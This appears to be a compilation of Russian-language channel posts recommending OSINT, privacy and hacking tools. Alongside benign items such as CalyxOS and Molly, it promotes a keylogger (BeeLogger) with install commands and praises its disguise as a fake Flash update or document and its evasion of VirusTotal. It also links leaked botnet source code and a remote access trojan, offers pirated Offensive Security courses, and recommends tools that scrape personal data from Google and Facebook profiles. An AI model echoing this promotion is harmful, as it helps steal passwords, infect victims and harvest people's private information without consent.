WAGSCRAPER

Вырезает ссылки на группы WhatsApp из результатов Google и дает рабочие ссылки (с именами групп и изображениями).

(Если немного изменить код, можно искать группы по ключевым словам и датам)

Создатель
@ rizad_x96


#whatsapp #socmint #osint

Сравните 6 сервисов для удаления фона (большинство из них бесплатные)
Все дают РАЗНЫЕ результаты
Все делают ОШИБКИ
Для достижения оптимального результата необходимо их комбинировать.
1 remove.bg
2 inpixio.com
3 clippingmagic.com
4 slazzer.com
5 remove.ai
6 spark.adobe.com

у нас тут слив курсов 0ffеnsive Секурити, спустя сутки это сообщение удалим так что качайте пока есть сиды

njal.la - лучший регистратор доменных имён, администрация рекомендует

SillyRAT - кроссплатформенный многофункциональный (Windows / Linux / Mac) RAT

http://www.kitploit.com/2021/11/sillyrat-cross-platform-mulfunctional.html

Господа, можете помочь протестировать мою доработку GHunt?
https://github.com/soxoj/GHunt

Реализовал извлечение личной информации -- указанные в "О себе" телефоны, языки, адреса, места работы/учёбы.

​​CalyxOS — операционная система на базе Android 11, ориентированная на приватность и безопасность.

Первый релиз CalyxOS состоялся 5 сентября 2020 года. В августе этого года вышел CalyxOS 2.8.0, не привязанный к сервисам Google.

Основной функционал:
— установлен свободный пакет microG вместо проприетарного GApps;
— Mozilla Location Services (с DejaVu) вместо дефолтных гугловских сервисов для геолокации и Nominatim на базе OpenStreetMap вместо Google Maps;
— интеграция приложения «Телефон» c мессенджером Signal;
— встроенный фаерволл Datura;
— OpenPGP в почтовом клиенте K-9, для управления ключами используется OpenKeychain;
— подключение через VPN (приложения Calyx VPN и Riseup VPN), в том числе других привязанных к смартфону устройств;
— приватный провайдер Cloudflare DNS по умолчанию: как известно, Cloudflare одним из первых внедрил протокол шифрования DNS over HTTPS (DoH).

Дополнительные функции:
— верификация кода по цифровой подписи при каждой загрузке для защиты прошивки от изменений;
— автоматическое отключение Wi-Fi и Bluetooth по таймауту;
— «красная кнопка» для экстренной чистки данных и удаления определённых приложений (двойное дно)
— автоматическое исключение из журнала звонков конфиденциальных номеров;
— блокировка по умолчанию неизвестных USB-устройств;
— автоматические бэкапы приложений (на USB-флэшку или в облако Nextcloud);
— браузеры DuckDuckGo и Tor;
— анонимная установка приложений из Google Play через Aurora Store, а также из свободного каталога F-Droid.

Впечатляет? ОС и правда пушечная, советую затестить.

#OC #анонимность #android

Tinytor — python-пакет, применяемый для связи с Tor Hidden Services через сеть Tor.

Будет полезен Python разработчикам.

#Tor #анонимность

​Бесплатно пользуемся безопасным облаком

Помещаем медиа-файлы в личное хранилище, доступное юзеру только по пин-коду или отпечатку пальца, — и все, ваши дикпики никто не увидит.

Создатели этого сервиса решили, что у других аналогов либо слишком много рекламы, либо слишком дорогие премиум-подписки. Neo Vault — бесплатное (что? да!) хранилище для всех типов медиафайлов. Каждый из них шифруется по стандарту AES-256 военного класса.

Пользователи в отзывах хвалят интуитивный интерфейс и простоту в управлении. Работает только на Андроиде, так что у кого Айфон — придется поискать что-то другое.

Hackingtool — комплексный хакерский инструмент, включающий в себя все топовые тулзы с GitHub.

Например, WiFi-Pumpkin, Hera Chrome Keylogger, UFOnet, XSpear и еще десятки других. Список весьма любопытный.

#софт #хакинг #анонимность

NemesisFixed Botnet Source Code (Not Cracked/Rooted)

https://anonfiles.com/51g4adW7ub/NemesisFixed_leak_by_matsaki_zip

Очень простой инструмент, который поможет вам определить, какой трек воспроизводится на текущей вкладке браузера.

Что мне больше всего нравится в нем, так это то, что он работает, когда звук выключен (хотя и с небольшой задержкой).

https://chrome.google.com/webstore/detail/aha-music-song-finder-for/dpacanjfikmhoddligfbehkpomnbgblf/related

Альтернативы #shazam

Создатель
@acrcloud

АШОК

Swiff нож для #osint

Заголовки HTTP
Поиск DNS
ПОДдомены
NMAP
Поиск имени пользователя Github
CMS обнаружение
Извлечь ссылки с веб-страницы
GEOIP
Захват баннера
Google Dorks
Обратное сканирование

https://github.com/ankitdobhal/Ashok

DumpItBlue+

@GoogleChrome
extension for
@Facebook
:
- dump to txt file friends, group members, messenger contacts etc;
- automate scroll page to bottom (+isolate scrolling)
- automate expanding comments and replies;
- much more.

#socmint #osint

https://chrome.google.com/webstore/detail/dumpitblue%2B/igmgknoioooacbcpcfgjigbaajpelbfe/related

Скрытая программа для ловли паролей

Beelogeer — электронный кейлоггер с открытым исходным кодом. Это мощный инструмент и скрытый инструмент, который можно замаскировать под фейковое обновление Adobe Flash, документ Word, Pdf или Pptx.

Установка:

$ apt install git python
$ git clone https://github.com/4w4k3/BeeLogger.git
$ cd BeeLogger
$ bash install.sh

Использование:
$ python bee.py

Генерируем подходящий нам файл цифрами. Из приятностей — VirusTotal почти не детектедит наш файл.

https://github.com/4w4k3/BeeLogger

Molly

Molly - независимый форк Signal для Android

В 2018 году Signal позволил пользователю установить парольную фразу для защиты локальной базы данных сообщений. Но эта опция была удалена с введением файлового шифрования на Android. Молли возвращает его снова с дополнительными функциями безопасности.

Молли подключается к серверу Signal, поэтому вы можете легко общаться со своими контактами Signal. Каждые две недели Молли обновляется, чтобы включить в нее последние функции и исправления ошибок от Signal.

У Молли есть уникальные особенности по сравнению с Signal:
▫️ Шифрование данных в состоянии покоя
▫️ Безопасный очиститель RAM
▫️ Автоматическая блокировка
▫️ Удаление контактов
▫️ ️Блокировать неизвестные контакты
▫️ Исчезающая история вызовов
▫️ Журналы отладки являются необязательными
▫️ Настраиваемое расписание резервного копирования
▫️ Поддержка прокси SOCKS и Tor

https://github.com/mollyim/mollyim-android

Репозиторий F-droid: https://molly.im/download/fdroid/

Сайт: https://molly.im/

transferfile [ transferfile.io ]
Интересный децентрализованный сервис обмена файлами использующий IPFS при этом полностью бесплатный, без регистраций и поддерживающий файлы до 32Gb.

Автор заявляет о своём продукте следующее:
- Шифрование на стороне клиента: ваши файлы будут зашифрованы в вашем браузере, поэтому ничто не оставит вашу машину незащищенной.
- Децентрализованный: файлы размещаются в сети IPFS.
- Надежный: даже если сайт выйдет из строя или закроется, хранения хеша будет достаточно, чтобы при необходимости получить ваши файлы непосредственно из самой IPFS.

​AnonYou

AnonYou бесплатная утилита с открытым исходным кодом, написанная на bash, которая позволяет быстро выполнять действия, связанные с анонимизацией.

▫️ Изменение MAC-адреса на случайный или произвольный
▫️ Перенаправление всего трафика через TOR
▫️ Очистка ОЗУ
▫️ Очистка пространства подкачки
▫️ Надежное стирание файлов
▫️ Удаление системного журнала

https://notabug.org/Grey_Hat_Cybersecurity/AnonYou

#pentest #soft #mac #tor #bash